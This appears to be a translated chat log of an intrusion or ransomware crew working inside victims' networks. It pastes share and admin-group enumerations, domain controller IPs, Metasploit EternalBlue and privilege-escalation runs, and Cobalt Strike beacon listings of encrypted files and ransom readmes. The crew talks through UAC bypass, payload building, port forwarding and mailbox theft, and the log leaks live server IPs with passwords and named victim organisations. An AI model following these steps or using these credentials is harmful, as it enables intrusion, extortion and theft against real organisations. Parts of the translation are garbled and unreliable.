\\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIDCG004.Hobbes.loc\C$ - Default share
\\PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share
\\PCHIDCG004.Hobbes.loc\slETL$ -
\\PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share
\\USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-LSS001.Hobbes.loc\C$ - Default share
\\Extreme Loading_for_Structures - Extreme Loading┬" for Structures
\\USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SPS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 -
\\USCHI-SPS001.Hobbes.loc\C$ - Default share
\\USCHI-SPS001.Hobbes.loc\E$ - Default share
\\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0
\\USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NWA001.Hobbes.loc\C$ - Default share
\\USCHI-NWA001.Hobbes.loc\E$ - Default share
\\USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NWA001.Hobbes.loc\KC$ -
\\USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions.
\\USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor.
\\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers
\\Prints$ - Remote Admin
\\LT-000108.Hobbes.loc\C$ - Default share
\\LT-000108.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-VHH010.Hobbes.loc\C$ - Default share
\\USCHI-VHH010.Hobbes.loc\E$ - Default share
\\USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIDCG003.Hobbes.loc\C$ - Default share
\\PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share
\\PCHIDCG003.Hobbes.loc\slETL$ -
\\PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share
\\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG011.Hobbes.loc\C$ - Default share
\\PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG011.Hobbes.loc\Lenel$ -
\\USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PWA001.Hobbes.loc\C$ - Default share
\\USCHI-PWA001.Hobbes.loc\E$ - Default share
\\USCHI-PWA001.Hobbes.loc\F$ - Default share
\\USCHI-PWA001.Hobbes.loc\G$ - Default share
\\USCHI-PWA001.Hobbes.loc\H$ - Default share
\\USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC
\\ClusterStorage$ - Cluster Shared Volumes Default Share
\\DAG01.Hobbes.loc\IPC$ - Remote IPC
\\DT-000033.Hobbes.loc\A$ - Default share
\\DT-000033.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000033.Hobbes.loc\C$ - Default share
\\DT-000033.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\ActiveInk -
\\SQL0005.Hobbes.loc\ADMIN$ - Remote Admin
\\SQL0005.Hobbes.loc\C$ - Default share
\\SQL0005.Hobbes.loc\E$ - Default share
\\SQL0005.Hobbes.loc\F$ - Default share
\\SQL0005.Hobbes.loc\G$ - Default share
\\SQL0005.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\Temp -
\\USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-WSUS001.Hobbes.loc\C$ - Default share
\\USCHI-WSUS001.Hobbes.loc\E$ - Default share
\\USCHI-WSUS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
\\USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system.
\\USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance.
\\USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages
\\USCHI-NET002.Hobbes.loc\C$ - Default share
\\USCHI-NET002.Hobbes.loc\Client -
\\USCHI-NET002.Hobbes.loc\D -
\\USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share
\\USCHI-NET002.Hobbes.loc\Drivers -
\\USCHI-NET002.Hobbes.loc\E$ - Default share
\\EasySetupPayload - EasySetupPayload share for EasySetup Packages
\\USCHI-NET002.Hobbes.loc\F
\\USCHI-NET002.Hobbes.loc\F$ - Default share
\\USCHI-NET002.Hobbes.loc\ImagesFiles -
\\USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET002.Hobbes.loc\print$ - Printer Drivers
\\USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation
\\USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015)
\\USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share
\\USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015
\\USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015
\\USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20
\\USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage
\\USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share
\\USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory
\\USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20
\\SITE - SMS Software Update Installation Agent -- 09/21/20
\\USCHI-NET002.Hobbes.loc\SourceFiles -
\\USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-BKP110.Hobbes.loc\C$ - Default share
\\USCHI-BKP110.Hobbes.loc\E$ - Default share
\\USCHI-BKP110.Hobbes.loc\F$ - Default share
\\USCHI-BKP110.Hobbes.loc\G$ - Default share
\\USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-BKP110.Hobbes.loc\VBRCatalog -
\\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-CAS001.Hobbes.loc\C$ - Default share
\\USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share
\\USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS001.Hobbes.loc\C$ - Default share
\\USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS001.Hobbes.loc\SkypeShare -
\\USCHI-SBS001.Hobbes.loc\SkypeShare1 -
\\USCHI-SBS001.Hobbes.loc\Users -
\\USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication
\\USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS002.Hobbes.loc\C$ - Default share
\\USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-EM-LT400.Hobbes.loc\C$ - Default share
\\USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC
\\DT-000025.Hobbes.loc\A$ - Default share
\\DT-000025.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000025.Hobbes.loc\C$ - Default share
\\DT-000025.Hobbes.loc\IPC$ - Remote IPC
\\DT-000025.Hobbes.loc\print$ - Printer Drivers
\\USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS003.Hobbes.loc\C$ - Default share
\\USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers
```

```
Alias name     Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\ITSUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN
```

confuconfuconfuconfucon@tl1

```
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
DILBERT                  MS-0001                  RAMIREZJ
SPS19-Admin              SPS-DB-2019              SPS-TS-2019
SVC-NWA001
```

```
Domain Controllers:

Server Name     IP Address
-----------     ----------
PCHIDCG003      10.20.32.100
PCHIDCG004      10.20.32.28
USCHI-DCP001    10.20.32.175
USCHA-DCG002    10.6.0.56
USCHI-DCG003    10.20.32.103
USCHI-DCG001    10.20.32.101
PCHIDCG002      10.111.2.20
```

```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DILBERT                  ePOScan                  Exchange Service
LaiP                     MITORATJ                 MS-0001
PCHIAPG009               PCHIAPG014               PCHIDBG001
RAMIREZJ                 SAVDeploy                SCCMadmin
SCOMaction               SLADMIN                  SPS19-Admin
SPS-DB-2019              SPS-TS-2019              SQL0005
SVC-CAS                  SVC-ESRI                 SVC-NWA001
SVC-PW-DBG001            SVC-PWORCHFWK            SVC-PW-ORCHFWK
SVC-PWPWD001             SVC-Veeam                TAGGESE
USCHIPWA001              USCHIPWD001              USCHIPWW001
```

AdFindgowconf

expFederal.com

And also without a domain there one more session came even with lou all know the rules write logins in the personal for admin bilder shelkodavo login another session then look for vpn

domain not available

I have in the cob hangs another session

who took off the ad info?

```
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter >
[*] 10.0.0.115 - Meterpreter session 7 closed.  Reason: Died
```

failed to work from the input - though my domain is pinged from there - those sessions are not flying in the cobwebs - give me the domain - remove the ad user

+ as I see it passed to myself - get that grid from the cobwebs together with @user3

nu elevate the exploit will work and bypass yuac - no through elevate

@user7 once managed to get up not

Luckily, it's understandable

Tried a bunch of bypassuacs - all swear like this:

```
when the current user is not in a local admin group there is no point in trying to bypass uac
```

+

```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
```

Domain still not resolved?

http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx

Vin Serv 2008. All users who have creeds are on the same computer. LA is not among them.
Domain is not responding. No WPN configs. No char. No Credits in txt or other. There is no vulnerability on MS17:

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 173.234.155.45:9875
[*] 192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```

I ran it through the multihandler to the Meterpreter: `getsystem` - bypassed. Tried a bunch of bypassuacs - all swear like this: `Not in admins group, cannot escalate with this module`. Or it goes like this: `not-vulnerable: Target is not vulnerable`. I tried this (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session). Didn't help much either:

```
msf6 exploit(windows/local/service_permissions) > exploit

[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services...
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
```

Mother won't appreciate it

I was talking about logins, passwords, names, comments, files

nope

You were talking about logins, no passwords.

Will there be any more?

how the fuck did I say?

Take 3 sessions to 1

setcada@tl1 parsing sessions?

Password change passwd

23.106.160.50 p17464 pwd:Lukashenko228!

you have to do it every time you go in ssh

/usr/bin/bash

useradd -m username --shell "shell path" && passwd username

password set?

create a sheet of your own for now....

Are you serious... i must have tried before you write and when you specify explicitly need to write along with the useradd -m -d /home/user3 user name, it creates itself in /home when you specify the directory do not need to write the full path possible centOS or pure Deb there is no such a fuck up not understand that with vds i create usera with explicit directory specify useradd -m -d /home/user3 user3 I'm logged out in a new terminal and see this

```
 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives

0 updates can be installed immediately.
0 of these updates are security updates.

$ hole
-sh: 1: holes: not found
$ ls
$
```

I specify mkhomedir_helper user3 does not work either. I check cat /etc/passwd

```
user3:x:1000:1000::/home/user3:/bin/sh
```

Waiting for sessions, disassembling, working.

206.221.186.34:44482 pqtbjTVtIMYBudInFs7VVVoZDHjDvqtAR1v

Current postpone other than @user4 so move on

okay

shob do not get lost can a separate channel for feedback ?

on the additional modules - link + reason / description

Necessary to make that commands collected kerbs, out of the box worked smbauto brut, was able to download files, one command remove the addfind, one command output da, da, and other things.

This is at least

PowerView.ps1

what kind of preview?

more specifically, links to git and other stuff that would raise the privileges

links and stuff, what is necessary

mostly bugs, okay

++

No way to download files from the client pc, in ptn downloaded (see Download Files), but there is no download (opens a new tab - server not found). I would like to import scripts directly from the PC to the Ptsh, rather than via a link. Problems with sockets - comes in two or three sessions. If you work in one session, you write a command, but it is duplicated two or three times, the same number of sessions flew in... Well, the built-in toolkit could be richer... in coba it is less frequent in times, it is hardly a complaint about the tool, coba in ass conditions also often dies or does not knock) very often sessions die, which is a minus)))) there is also a button of files ....

mmm

vt it's blueada, i couldn't find it either until they said there's a button visible

bug

about the line at the top? nothing more to say i would like a normal panel, not a white rectangle

I would like to have a normal panel, not a white rectangle.

give feedback

status write to the confab at once

yesterday check them again? check all sisd servers + availability on what? check all the servers sisd.petya probably.. who's free now? set up for msf-deploy your arma there and work together today will have to suffer

One for all is not an option. The entire subnet gets pulled into the armoue if you scan.
+ will be a hassle if you work at the same time in the arm still in msf

nu since the time you have gained experience so you can try again)

I do not remember, we originally had one for all was... and what was it that worked in turns in what? so like will conflict, if the crowd there also fell off so one for all. all who need to replace the old one in the sense of it for one? do not forget to remove inactive sessions behind you?

23.106.160.50:17464 HJ6Hmf7KNP3w2w7HCtprxRHGg6q92E9LsvWLv98y

```
ShellConcatination --source=shellStarter_llvm_x64.dll -keep --target=pl64.dll --addBin=plbin
```

this is how you built, pyload x64 check the system bit type x86 ? how did you build and run ? if all went well the domain authorization should have died

why ?

```
beacon> ls \\admindc1\c$
[*] Tasked beacon to list files in \\admindc1\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc1\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     07/10/2020 08:19:50   $Recycle.Bin
          dir     12/08/2020 23:30:15   AdminDC1
          dir     12/08/2020 23:30:15   batch
          dir     12/08/2020 23:30:15   ck-agent
          dir     10/26/2018 09:36:07   Documents and Settings
          dir     12/08/2020 23:30:15   inetpub
          dir     12/08/2020 23:30:16   logs
          dir     12/09/2020 12:27:52:52   MSI
          dir     10/26/2018 13:40:56   PerfLogs
          dir     12/08/2020 23:30:16   Program Files
          dir     12/09/2020 02:24:43   Program Files (x86)
          dir     12/08/2020 23:30:16   ProgramData
          dir     12/08/2020 23:30:16   Recovery
          dir     12/08/2020 23:30:10   System Volume Information
          dir     10/12/2020 15:18:46   temp
          dir     12/08/2020 23:30:16   Users
          dir     12/02/2020 03:33:28   Windows
          dir     12/08/2020 23:30:16   Zabbix_Agent
 1kb      fil     12/08/2020 23:30:15   AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU
 1kb      fil     12/08/2020 23:30:15   admindc1.cer.HWOEU
 375kb    fil     07/16/2016 07:18:08   bootmgr
 535b     fil     12/08/2020 23:30:15   BOOTNXT.HWOEU
 16gb     fil     11/13/2020 07:53:40   pagefile.sys
 1kb      fil     12/08/2020 23:30:15   readme.txt
 40mb     fil     12/09/2020 08:06:26   redcloak.msi

beacon> ls \\admindc2\c$
[*] Tasked beacon to list files in \\admindc2\c$
[+] host called home, sent: 31 bytes
[-] could not open \\admindc2\c$\*: 53

beacon> ls \\admindc3\c$
[*] Tasked beacon to list files in \\admindc3\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc3\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     07/28/2019 07:12:07   $Recycle.Bin
          dir     12/08/2020 23:32:07   ck-agent
          dir     12/09/2020 02:39:28   Config.Msi
          dir     10/26/2018 15:02:45:45   Documents and Settings
          dir     12/08/2020 23:32:08   Logs
          dir     10/29/2018 14:52:44   PerfLogs
          dir     12/08/2020 23:32:08   Program Files
          dir     12/09/2020 02:39:18   Program Files (x86)
          dir     12/08/2020 23:32:08   ProgramData
          dir     12/08/2020 23:32:08   Recovery
          dir     12/08/2020 21:50:51   System Volume Information
          dir     12/08/2020 23:32:08   Users
          dir     12/02/2020 03:45:13   Windows
          dir     12/08/2020 23:32:08   Zabbix_Agent
 375kb    fil     07/16/2016 07:18:08   bootmgr
 535b     fil     12/08/2020 23:32:07   BOOTNXT.HWOEU
 16gb     fil     11/13/2020 16:25:59   pagefile.sys
 1kb      fil     12/08/2020 23:32:07   readme.txt
 40mb     fil     12/09/2020 08:06:26   redcloak.msi

beacon> ls \\admindc4\c$
[*] Tasked beacon to list files in \\admindc4\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc4\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     07/11/2019 13:34:37   $Recycle.Bin
          dir     12/08/2020 23:32:33   ck-agent
          dir     10/29/2018 09:10:11:11   Documents and Settings
          dir     12/08/2020 23:32:35   Logs
          dir     10/29/2018 13:19:55   PerfLogs
          dir     12/08/2020 23:32:35   Program Files
          dir     12/09/2020 02:41:13   Program Files (x86)
          dir     12/08/2020 23:32:35   ProgramData
          dir     12/08/2020 23:32:35   Recovery
          dir     12/08/2020 23:32:28   System Volume Information
          dir     12/08/2020 23:32:35   Users
          dir     11/17/2020 13:36:48   Windows
          dir     12/08/2020 23:32:35   Zabbix_Agent
 375kb    fil     07/16/2016 07:18:08   bootmgr
 535b     fil     12/08/2020 23:32:33   BOOTNXT.HWOEU
 16gb     fil     11/17/2020 13:46:41   pagefile.sys
 1kb      fil     12/08/2020 23:32:33   readme.txt
 40mb     fil     12/09/2020 08:06:26   redcloak.msi

beacon> ls \\admindc5\c$
[*] Tasked beacon to list files in \\admindc5\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc5\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     07/11/2019 13:42:13   $Recycle.Bin
          dir     12/08/2020 20:24:33   $SNAP_202012020302_VOLUMEC$
          dir     12/08/2020 20:24:33   AdminDC1
          dir     12/08/2020 20:24:33   ck-agent
          dir     10/29/2018 09:48:27:27   Documents and Settings
          dir     12/08/2020 20:24:33   iboss-ad-installers-110818
          dir     12/08/2020 20:24:35   Logs
          dir     10/29/2018 14:45:30   PerfLogs
          dir     12/08/2020 20:24:35   Program Files
          dir     12/09/2020 02:48:53   Program Files (x86)
          dir     12/08/2020 20:24:35   ProgramData
          dir     12/08/2020 20:24:36   Recovery
          dir     12/08/2020 20:24:28   System Volume Information
          dir     12/08/2020 20:24:36   Users
          dir     12/02/2020 02:48:40   Windows
          dir     12/08/2020 20:25:25   Zabbix_Agent
 375kb    fil     07/16/2016 07:18:08   bootmgr
 535b     fil     12/08/2020 20:24:33   BOOTNXT.HWOEU
 16gb     fil     11/13/2018 11:25:20   pagefile.sys
 1kb      fil     12/08/2020 20:24:33   readme.txt
```

?

ls list of dk check them

ya now on azuredc

dk is available?

```
beacon> ls \\dhcp02\c$
[*] Tasked beacon to list files in \\dhcp02\c$
[+] host called home, sent: 29 bytes
[*] Listing: \\dhcp02\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     04/22/2016 01:52:17   $Recycle.Bin
          dir     12/08/2020 23:09:27   clu
          dir     12/08/2020 23:09:27   compaq
          dir     12/09/2020 11:37:37   Config.Msi
          dir     12/08/2020 23:09:27   cpqsystem
          dir     08/22/2013 08:48:41   Documents and Settings
          dir     12/08/2020 23:09:27   hp
          dir     08/22/2013 09:52:33   PerfLogs
          dir     12/08/2020 23:09:27   Program Files
          dir     12/09/2020 02:49:13   Program Files (x86)
          dir     12/09/2020 12:55:15   ProgramData
          dir     12/08/2020 23:09:22   System Volume Information
          dir     12/08/2020 23:09:27   Users
          dir     09/21/2020 10:12:03   Windows
          dir     12/08/2020 23:09:27   zabbix_agent
 389kb    fil     09/30/2013 15:37:02   bootmgr
 535b     fil     12/08/2020 23:09:27   BOOTNXT.HWOEU
 5kb      fil     12/08/2020 23:09:27   cpqsprt.trace.HWOEU
 3gb      fil     06/01/2020 10:32:41   pagefile.sys
 23kb     fil     12/08/2020 23:09:27   PHH_wirless2.txt.HWOEU
 1kb      fil     12/08/2020 23:09:27   readme.txt
 40mb     fil     12/09/2020 08:06:26   redcloak.msi
 3kb      fil     12/08/2020 23:09:27   smh_installer.log.HWOEU
 615b     fil     12/08/2020 23:09:27   zabbix_agentd.log.HWOEU

beacon> ls \\kms\c$
[*] Tasked beacon to list files in \\kms\c$
[+] host called home, sent: 26 bytes
[*] Listing: \\kms\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     09/15/2018 01:19:00   $Recycle.Bin
          dir     03/30/2020 09:58:18   Documents and Settings
          dir     05/29/2020 10:17:56   PerfLogs
          dir     12/08/2020 20:58:12   Program Files
          dir     12/08/2020 20:58:12   Program Files (x86)
          dir     12/08/2020 20:58:12   ProgramData
          dir     12/08/2020 20:58:12   Recovery
          dir     12/08/2020 20:58:07   System Volume Information
          dir     12/08/2020 20:58:12   Users
          dir     05/29/2020 10:17:57   Windows
 1gb      fil     05/29/2020 10:18:36   pagefile.sys
 1kb      fil     12/08/2020 20:58:12   readme.txt

beacon> ls \\hyperv24\c$
[*] Tasked beacon to list files in \\hyperv24\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\hyperv24\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     12/08/2020 22:10:00   Avamar
          dir     11/06/2020 08:02:07   ClusterStorage
          dir     11/05/2020 16:57:08   Documents and Settings
          dir     11/06/2020 07:32:25   PerfLogs
          dir     12/08/2020 22:10:00   Program Files
          dir     12/09/2020 09:05:16   Program Files (x86)
          dir     12/08/2020 22:10:00   ProgramData
          dir     12/08/2020 22:10:00   Recovery
          dir     12/08/2020 22:09:56   System Volume Information
          dir     12/09/2020 09:04:58   Users
          dir     11/06/2020 07:55:21   Windows
          dir     12/08/2020 22:10:00   Zabbix_Agent
 839b     fil     12/08/2020 22:10:00   NWT_hotfix_report.html.HWOEU
 526kb    fil     12/08/2020 22:10:00   NWT_Install.log.HWOEU
 384kb    fil     12/08/2020 22:10:00   NWT_Nimble_DSM_Install.log.HWOEU
 19gb     fil     11/06/2020 07:57:46   pagefile.sys
 1kb      fil     12/08/2020 22:10:00   readme.txt
 40mb     fil     12/09/2020 08:06:26   redcloak.msi
```

Checked 3 everywhere is the riddimi, but check something nearby under the creed DAOK)

all or those who have a jam on the current?

A long time we have not been with you this format)

you have about 1.5 hours to work on the current, then give access to the cobu and there again will be parsed to work

```
 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     10/09/2020 09:34:10   $Recycle.Bin
          dir     07/10/2020 13:27:44   Documents and Settings
          dir     12/08/2020 23:33:21   $Packages
          dir     07/10/2020 12:14:14   PerfLogs
          dir     12/08/2020 23:33:21   Program Files
          dir     12/09/2020 08:44:13   Program Files (x86)
          dir     12/08/2020 23:33:21   ProgramData
          dir     12/08/2020 23:33:21   Recovery
          dir     12/08/2020 23:33:16   System Volume Information
          dir     12/08/2020 23:33:21   Users
          dir     07/21/2020 11:40:36   Windows
          dir     07/20/2020 14:24:04   WindowsAzure
 380kb    fil     11/21/2016 00:36:43   bootmgr
 535b     fil     12/08/2020 23:33:21   BOOTNXT.HWOEU
 1kb      fil     12/08/2020 23:33:21   readme.txt
```

ridd is

and check the root of the disk

Snetu I have, everything is empty, cleared recently

kobuodnaa do you have many live sessions in sisd?

judging by the chinese cmd far traffic flies)

session by the way at slip 5 response minutes

have not tried all past or not tried?

other than ms17?

now i will try to scan this computer for ms17

> none of them is LA, no credits

where?

i wrote in lpe direction

what?

in general here are all users on one computer, none of them is not LA, domain is not responding, no configs ipn, balloon, no credits

poka no question - can coba clean from sisd.net sessions?

octe who asked for wps under the msf - in the afternoon if no questions, If you have any questions then let's get to work

good day

Hi all

hello

hi

tobi pizda)

Morally I'm with you guys)

and optimize the actions to reduce unnecessary and useless

nu finalize / reprocess all my hard drive from the "working" roughly related to the development of copyright full tulkit which we saw

my now do a channel one thematic can for half an hour will be distracted for a small discussion, and you guys are all here now?
projection of the logics prescribed in the DUs and groups to the results of scans from different points-try to understand the logic of the location of "hardware" that blocks the ports it can be in the physical location, functional purpose, destination "by department", just an iron between the server and user segments often these networks have many DCs and subnets are isolated from each other but no domain controllers for successful replication and almost never on the "tech machine" they put phasers on the segments and look for a route correct solution administration of network firewalls that prohibit incoming connections and not the fact that it will skip all the same but this will hardly work because ntlm relay in its current state can "hit" only another machine other than the one from which initiated the connection spuf some not just to make it work but to make the authorization from this machine. all ports closed? all ports closed? but we were able to break into the session ``` in the "outgoing" session? i have a question, why not do the bind? not yet work in the ones that were, but if there are new ones - wait for it) nowhere? there is no yes where yes? 2 grids close to deadlocks is there to work? longHow are you? helloToday the ceiling is still an hour, prepare a lack of data, tomorrow for lunchso I need to go away on business, I understand that there is something to do, write, if I can help what to tell - I will definitely advise when I return://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/?то are conditional technicians a couple .pst pull and ommm no clue... 
I usually just downloaded the target boxes through EAC@tl2 question on >3) a backup of the mail server so i had a server named `Exchange.rtpco.local` I go to `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox` and i download that hereff twitch, chromium will not decrypt without masterkeyypodderderzhayut browsers at the admins carefully without cobalt sesikarbon - fact, well, they also do not have exchendge, i need to look for mail on #evo-com there everything is ready except two nas in vokrrup, they should look in the admins browsers, we have looked there only fs and ff, since.We have not jumped anywhere on the machines, worked from the dedicat on the vpnom. Cabron sees everything, so if we jump somewhere, it will count down and on the same day it has to be closed. And the time there is - 11, so we have to start somewhere at 9 - 10 in the morning.Today in general, the idea of three-toni have not yet come it to @user3 and @user9 they seem to be working with this grid on #evo-com. how's it going? hi. on #rtpcompany-com. found a bunch of esxi's that they didn't find last time, and some creeds for them, kinda left to finish the additional tasks (skul, exh, etc.) on #waterway-com. I've still not picked up the nimbles' credentials, they seem to pass them on a piece of paper, the IT guys have keylog, one of them tried on Friday and could not get to nimbles, then got into lustpass and self-locked there podskazite what progress was at the end of last week on the current tasks@tl1 today is absent - so I substitute all hiAnd write yourself a mindmap to raise the rights from LP to DANa write a detailed report on the work done in the last 2-3 days in the LS. While you can take care of organizing entries for modules and other things, as well to write a manual to himself on all the vectors that were and in what order is better to act. 
Finish at 20:00 today
http://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-aktivnye-s-s-powershell/
if the `beacon_reverse_tcp` payload works in `Windows Executable (S)` which went through `shellConcatenation.1.0.0` but it does not work through `rportfwd`, most likely the problem is in `rportfwd` itself
and checked on a normal https listener? or already on rportfwd?
and what don't you like about `Attack -> Packages -> Payload Generator`?
it is 255 times larger
Yes, but not sure that `shellConcatenation.1.0.0` itself supports such a file size
RAW) and about `rportfwd` I don't quite understand
```
beacon> help rportfwd
Use: rportfwd [bind port] [forward host] [forward port]
     rportfwd stop [bind port]

Binds the specified port on the target host. When a connection comes in, Cobalt Strike will make a connection to the forwarded host/port and use Beacon to relay traffic between the two connections.
```
`Windows Executable (S) - RAW` is a stageless variant; namely, when you do RAW through `Attack -> Packages -> Payload Generator` you make an intermediate file that, after launching, downloads the working code of the Cobalt itself, whereas in `Windows Executable` this working code goes in immediately, without additional staging
then until lunch, work with it all together + from sessions only MATCHES?
Good morning
Good morning everyone, I'll be right down
Telepathic? Don't get it dirty, just be careful, it's painted
Do the door mighty🗿
There's a forget-me-nots
Good morning
Good morning, can I go there too? skytechinc.com ``
@user9 - prepares the network and still hasn't given me an external domain for the chat
@user7 - #corp-televisa-com-mx
@user8 - gave me a VPN
@user3 - gave me a ripcord
@user4 - gave out a vpn, kznm
so he's deadbeat, he
@user9 is busy with the network, he's preparing to close
me - definitely not caught?
I don't think so
They had no password manager set up on solara
that's what? #ballymoregroup-com there were two NAS passwords, one didn't work
